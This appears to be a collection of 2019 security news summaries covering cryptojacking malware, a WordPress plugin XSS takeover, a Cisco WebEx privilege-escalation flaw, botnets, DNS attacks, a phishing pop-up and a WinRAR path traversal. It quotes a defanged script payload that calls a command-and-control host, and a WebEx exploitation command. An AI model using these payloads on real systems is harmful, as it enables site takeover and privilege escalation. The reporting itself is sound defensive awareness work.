Please share important information  this with those who you know.

Whether as the result
of isolation, diminished cognition, financial insecurity, trusting too much,
being ashamed to report being scammed or concerned about how relatives will
react, serious concern for health or other causes, many of these crimes go
unreported.

Information on The Federal Bureau of
Investigation Site

https://www.fbi.gov/scams-and-safety/common-fraud-schemes/seniors

This free event has lots of good content the session are listed below. the event is Streaming Live April 16 , 9-12 noon PT.
To register go here

In November of 2018 Forbes ran an article about the increase of cryptojacking. At the time the Cyber Threat Alliance (CTA) was indicating a 629% increase of infections in just the short time between Q1 to Q2 of 2018. Threats had grown from an estimated 400,000 (Q4 2017) infections to 2.5 million infected machines in Q2 of 2018. 2019 is still showing growth in cryptojacking threats.

The number of tools available to bad actors has grown. For example the Russian threat, WebCobra, that McAfee Labs researchers found, was able to drop one of two different payloads based on architecture it detected on the infected machine.

The threats are continuing to become more sophisticated as well.  360 Total Security researchers have released the details of the newer PsMiner malware. Designed to exploit known vulnerabilities in servers running ElasticSearch, Hadoop, Redis, Spring, Weblogic, ThinkPHP, and SqlServer to spread from server to server to mine for Monero.

The worm uses a file called Systemctl.exe written in the Go language to bundle then download the exploit modules and to attack Windows servers. In addition to the exploits, PsMiner has the ability to brute force its way in to a system. When it detects weak or default credentials, it can utilize a brute force password cracking component.

Once it PsMiner has access to a system, it then uses a PowerShell command to download a WindowsUpdate.ps1 with a malicious payload and master module that will drop the Monero miner on the system. The malware then copies itself into the temp directory and create a scheduled task called “Update service for Windows Service” that will run once every 10 minutes to prolong and refresh the infection. Using the XMRig CPU miner and a custom mining profile while using Living-off-the-Land (LotL) techniques, the worm can persist for some time.

This also shows a level of sophistication to which the bad actors have access.  Another example of this type of attack sticking around is the eight Microsoft Store apps found dropping cryptojacking malware on systems: Fast-search Lite, Battery Optimizer (Tutorials), VPN Browsers+, Downloader for YouTube Videos, Clean Master+ (Tutorials), FastTube, Findoo Browser 2019, and Findoo Mobile & Desktop Search.

These Apps have been since removed from the Microsoft store, but show a troubling pattern of predatory behavior.  Estimates are indicating that there have been ten times more organizations affected by cryptojacking than ransomware just last year. It is clear that cryptojacking is still a threat to consider in 2019.

Sources
• https://www.bleepingcomputer.com/news/security/malware-spreads-as-a -worm-uses-cryptojacking-module-to-mine-for-monero/

• https://www.forbes.com/sites/rachelwolfson/2018/11/13/cryptojackingon-the-rise-webcobra-malware-uses-victims-computers-to-minecryptocurrency/#20183346c336

• https://blog.malwarebytes.com/cybercrime/2018/02/state-maliciouscryptomining/

    Online shopping has the convenience of collecting items and dispensing personal judgement on the things you like and the things you don’t. All this without having the effort of hauling those things around a labyrinth of smells and sounds! And with the Abandoned Cart plugin for WordPress sites, the site administrator can hold on to your cart in case you have a desire to pick up where you left off if a sudden pressing matter arises, or you simply lose interest for the time being. But WordFence security researchers have noticed a flaw in the execution of the Abandoned Cart plugin which enables a complete site takeover along with laying a secondary backdoor to regain access in case of discovery.

    The Abandoned Cart plugin had a distinct lack of sanitation on the input and output of fields used when a user begins checking out. The billing_first_name and billing_last_name data fields are stored as entered. The two fields are then displayed concatenated in a customer field when the administrator logs in to view their dashboard.  The attack creates random first and last names and random email addresses to be acceptable form entries, but enters both the first and the last name as the billing_first_name entry and “<script src=hXXps://bit[.]ly/2SzpVBY></script>“ as the billing_last_name field. The URL points to a Command control server, “hXXps://cdn-bigcommerce[.]com/ visionstat.js” which contains a malicious JavaScript payload.

    The attacker first uses the victim’s browser session to make trusted actions on the WordPress website using hidden iframes, acting while the user is unaware of the invasion occurring. The first action taken is creating an administrative user for the site to which the attacker has the credentials. Who needs a backdoor, when you create keys to the front door for yourself? The user to these clandestine accounts has consistently been found to be “woouser” with a “woouser” email at mailinator, a free disposable email.  The malicious JavaScript then infects an inactive plugin with a malicious script that still listens for commands from the C2 server. The script can execute arbitrary PHP code on the compromised server. Both infiltration processes report the infected website’s URL to the C2 server and a confirmation email is sent to the mailinator address to confirm the administrator account.

    A patch for this vulnerability was released, which uses WordPress’ own data sanitizer to exclude names beginning with “<“ and any account with “woouser” in the email. While this prevents the initial attack from creating adversary controlled accounts, it doesn’t address the code injection in the deactivated plugins.

Sources:
https://www.wordfence.com/blog/2019/03/xss-flaw-in-abandoned-cartplugin-leads-to-wordpress-site-takeovers/

https:// nakedsecurity.sophos.com/2019/03/13/update-now-wordpress-abandoned-cartplugin-under-attack/Cryptojacking

     A new elevation of privilege vulnerability has been discovered in the Cisco WebEx Meetings desktop app for Windows® by security researcher Marcos Accossatto from SecureAuth Exploits’ Writers Team.

     This vulnerability, tracked as CVE-2019-1674, is an OS Command Injection that can be used to bypass new controls that Cisco put in place after patching a previously disclosed DLL hijacking issue in 2018. This vulnerability could allow a local attacker to elevate their privileges by invoking the update service command. An attacker could exploit this flaw by swapping out the Cisco WebEx Meetings update binary with “a previous vulnerable version through a fake update… that will load a malicious DLL.” The researchers also noted that while this vulnerability can only be exploited locally, it could be exploited remotely in an Active Directory setup through operating system remote management tools.

    The update service for Cisco WebEx Meetings uses XML to check against new files when installing an update. However, this vulnerability would fail to validate version numbers of new files. This is how attackers could potentially insert different files into the update service and trick the update service into “updating” the program to an older, insecure version of Cisco WebEx Meetings. According to SecureAuth, “The vulnerability can be exploited by copying to a local attacker controller folder, the ptUpdate.exe binary. Also, a malicious dll must be placed in the same folder, named wbxtrace.dll. To gain privileges, the attacker must start the service with the command line: sc start webexservice install software-update 1 ‘attacker-controlled-path’ (if the parameter 1 doesn’t work, then 2 should be used).” The research team also released a two-step Proof of Concept showing how this vulnerability can be exploited.

     The timeline for this vulnerability is about 2 months long and is as follows: on Dec. 4, 2018, SecureAuth sent the initial notification to Cisco PSIRT. On Dec. 5, 2018, Cisco confirmed they received the advisory and opened a case for it, and on Dec. 7, 2018, Cisco confirmed that they were able to reproduce the vulnerability and began working on a plan to fix it. On Dec. 10, 2018, Cisco told SecureAuth that the fix for the vulnerability would be generally available by the end of February. After a couple of attempts by SecureAuth to get updates on the status of the patch for the vulnerability, Cisco, on Jan. 22, 2019, said they were still aiming for an end of February release. Finally, on Feb. 11, 2019, Cisco confirmed that Feb. 27, 2019 would be the official disclosure date, and have now disclosed a patch for this security vulnerability.

    If your company uses Cisco WebEx Meetings desktop app on Windows, be sure to update it immediately to avoid any potential attacks due to this vulnerability.
Sources: 
• https://www.bleepingcomputer.com/news/security/new-elevation-ofprivilege-vulnerability-found-in-cisco-webex-meetings/
• https://securityaffairs.co/wordpress/81751/security/cisco-webex-elevation-privilege.html
• https://www.secureauth.com/labs/advisories/cisco-webex-meetingselevation-privilege-vulnerability

“Necurs is the multitool
of botnets, evolving from operating as a spam botnet delivering banking trojans
and ransomware to developing a proxy service, as well as cryptomining and DDoS
capabilities,” said Mike Benjamin, head of Black Lotus Labs. “What’s
particularly interesting is Necurs’ regular cadence of going dark to avoid
detection, reemerging to send new commands to infected hosts and then going
dark again. This technique is one of many the reasons Necurs has been able to
expand to more than half a million bots around the world.”

Key Takeaways

• Beginning in
  May of 2018, Black Lotus Labs observed regular, sustained downtime of
  roughly two weeks, followed by roughly three weeks of activity for the
  three most active groups of bots comprising Necurs.
• Necurs’ roughly
  570,000 bots are distributed globally, with about half located in the
  following countries, in order of prevalence: India, Indonesia, Vietnam,
  Turkey and Iran. 
• Necurs uses
  a domain generation algorithm (DGA) to obfuscate its operations and avoid
  takedown. However, DGA is a double-edged sword: because the DGA domains
  Necurs will use are known in advance, security researchers can use methods
  like sinkholing DGA domains and analyzing DNS and network traffic to
  enumerate bots and command and control (C2) infrastructure.
• CenturyLink
  took steps to mitigate the risk of Necurs to customers, in addition to
  notifying other network owners of potentially infected devices to help
  protect the internet. 

Additional Resources

• Discover how
  TheMoon has evolved into a proxy as a service: http://news.centurylink.com/2019-01-31-TheMoon-Illustrates-Evolving-Threat-of-IoT-Botnets.
• Learn more
  about Mylobot’s second stage attack: http://news.centurylink.com/2018-11-14-Mylobot-botnet-delivers-one-two-punch-with-Khalesi-malware.
• Find out how
  the Satori botnet is resurfacing with new targets: http://news.centurylink.com/2018-10-29-Satori-botnet-resurfaces-with-new-targets.

SOURCE CenturyLink, Inc.

With DNS server being attacked all over the world, The Internet Corporation for Assigned Names and Numbers (ICANN) believes that there is an ongoing and significant risk to key parts of the Domain Name System (DNS) infrastructure.

In the context of increasing reports of malicious activity targeting the DNS infrastructure, ICANN is calling for full deployment of the Domain Name System Security Extensions (DNSSEC)
across all unsecured domain names. The organization also reaffirms its
commitment to engage in collaborative efforts to ensure the security,
stability and resiliency of the Internet’s global identifier systems.

As one of many entities engaged in the decentralized management of the Internet, ICANN is specifically responsible for coordinating the top-most level of the DNS to ensure its stable and secure operation and universal resolvability.

On 15 February 2019, in response to reports of attacks against key parts of the DNS infrastructure, ICANN offered a checklist
of recommended security precautions for members of the domain name
industry, registries, registrars, resellers, and related others, to
proactively take to protect their systems, their customers’ systems and
information reachable via the DNS.

Public reports indicate that there is a pattern of multifaceted attacks utilizing different methodologies. Some of the attacks target the DNS,
in which unauthorized changes to the delegation structure of domain
names are made, replacing the addresses of intended servers with
addresses of machines controlled by the attackers. This particular type
of attack, which targets the DNS, only works when DNSSEC is not in use. DNSSEC is a technology developed to protect against such changes by digitally ‘signing’ data to assure its validity. Although DNSSEC cannot solve all forms of attack against the DNS, when it is used, unauthorized modification to DNS information can be detected, and users are blocked from being misdirected.

ICANN has long recognized the importance of DNSSEC
and is calling for full deployment of the technology across all
domains. Although this will not solve the security problems of the
Internet, it aims to assure that Internet users reach their desired
online destination by helping to prevent so-called “man in the middle”
attacks where a user is unknowingly re-directed to a potentially
malicious site. DNSSEC complements other technologies, such as Transport Layer Security (most typically used in HTTPS) that protect the end user/domain communication.

As the coordinator of the top-most level of the DNS, ICANN is in the position to help mitigate and detect DNS-related
risks, and to facilitate key discussions together with its partners.
The organization believes that all members of the domain name system
ecosystem must work together to produce better tools and policies to
secure the DNS and other critical operations of the Internet. To facilitate these efforts, ICANN is planning an event for the Internet community to address DNS protection: The first is an open session during the upcoming ICANN64 public meeting on 9-14 March 2019, in Kobe, Japan.

As we learn more information, updates may be provided. For information about ICANN64, visit https://meetings.icann.org/kobe64.

This article was a repost off of the ICANN site as a important security notice to all who use or have DNS servers.

According to the Register.co.uk 617million accounts stolen from 16 hacked websites now for sale on dark web, seller boasts.

 Some 617
million online account details stolen from 16 hacked websites are on
sale from today on the dark web, according to the data trove’s seller.

    Social media has changed how the world interacts with each other in so many ways, such as closer interaction between businesses and their customers, law enforcement alerts, and more.  Creators of public content that want any real degree of reach involves social media in their business and marketing plan somehow, including many requiring logging in through social media to view content.

    There are many methods to ensure that a login prompt is legit, but a new phishing technique
discovered by researchers at password management company MyKi throws the usual precautions out the window. Phishing is a fraudulent attempt to gain sensitive personal information through posing as a legitimate entity, such as a company or a website. It is a form of social engineering and is very popular and successful due to the willingness of many to take things on the internet at face value.

    Recent years have shown an increase in phishing attempts leading to serious data breaches, as was the case in the San Diego Unified School District breach involving social security numbers and other personal information of over 500,000 students and staff. 
   
    Researchers at Myki discovered the attackers were convincing victims to visit fraudulent sites for blogs and services that first required people to log in with a Facebook account to access the content. The sites looked legitimate, as did the pop-up window for the Facebook login: the URL was for www.facebook.com, it was using HTTPS with a green padlock to show a valid certificate, and browser addons for detecting malicious domains weren’t throwing any warnings. However, their credentials were still harvested by the attacker. The pop-up window was not a real window: it was created with HTML and JavaScript to imitate a real browser window but was part of the original page.

    The only way to tell is to try to drag the window away from the browser. If it is fake then part of the window will disappear past the edge of the browser instead of moving as a separate entity. While harvesting Facebook login credentials may not seem like much of a threat beyond seeing what cat pictures were posted by friends, many people use the same or similar credentials across many sites and this gives attackers a jump ahead in trying to gain unauthorized access to other accounts. Also, this same technique could show up in other areas in the future, such as e-commerce sites asking for PayPal logins or something similar.

Sources
• https://threatpost.com/sneaky-phishing-scam-facebook/141869/
• https://threatpost.com/san-diego-school-district-data-breach-hits-500kstudents/140366/
• https://thehackernews.com/2019/02/advance-phishing-login-page.html

     This past week, a vulnerability has been found in the WinRAR archive extraction software that has existed for almost 19 years. It was discovered by researchers at Check Point Software Technologies. The exploit allows for a path traversal which leads to remote code execution anywhere on the system. This issue stems from a third party dll, unacev2.dll, that is used to handle the .ace archive type.
    This bug was discovered through fuzzing the WinRaR program and identifying the root cause of a crash. When the group identified the problem, they looked for a memory corruption bug, but instead found a logical bug which let the team navigate to any location on the target machine without even needing to know a user name.
     When testing to identify the root cause of the bug, the fuzzer was used and they detected an anomaly where bits of the advertisement string and other pieces of the file’s hex dump were placed in a created directory and file.
     They were unable to recreate it exactly due to the file name validation functions of WinRaR when attempting to utilize this similar issue inside of WinRaR. Even though the original case is caught by WinRaR, the unacev2.dll function return is cancelled by WinRar, the folder is still created temporarily due to a late check for the value that calls for cancellation.
     This allows for the creation of empty files wherever the creator would like.  The team goes a step farther and circumvents the path limitations set by WinRar using the cleanPath function that WinRaR uses to remove extraneous ‘C:/’ from relative paths. By adding another ‘C:/’ the team was able to bypass this and gain Path Traversal because the WinRaR path Check does not look for the ‘C:’. It was supposedly removed by cleanPath. With a Path Traversal Vulnerability found, the team was able to gain access to an SMB attack vector by adding more arbitrary ‘C:/’ to strings to allow connections. Code execution is obtained by extracting a compressed executable file from an ace archive that’s been renamed to a .rar to a startup folder which will run the code on machine boot. The code itself is arbitrary and the consequences of this can be catastrophic.    

    You can even ignore usernames using the WinRar subkeys by right clicking on the archive in question, and moving it using that tool. This works because of how ‘C:’ is interpreted by windows. It represents the current directory of the running process, so inside of the WinRaR gui, it would be the WinRar folder, but using the menu option, it becomes C:Users<user name><location of the file>. When this exploit was reported to WinRar, they claimed that it was the third party’s code that allowed the arbitrary folder creation and decided to drop the support for the ACE archive format. 

Sources
• https://research.checkpoint.com/extracting-code-execution-from-winrar/

•https://news.softpedia.com/news/19-year-old-vulnerability-discovered-inwinrar-525050.shtml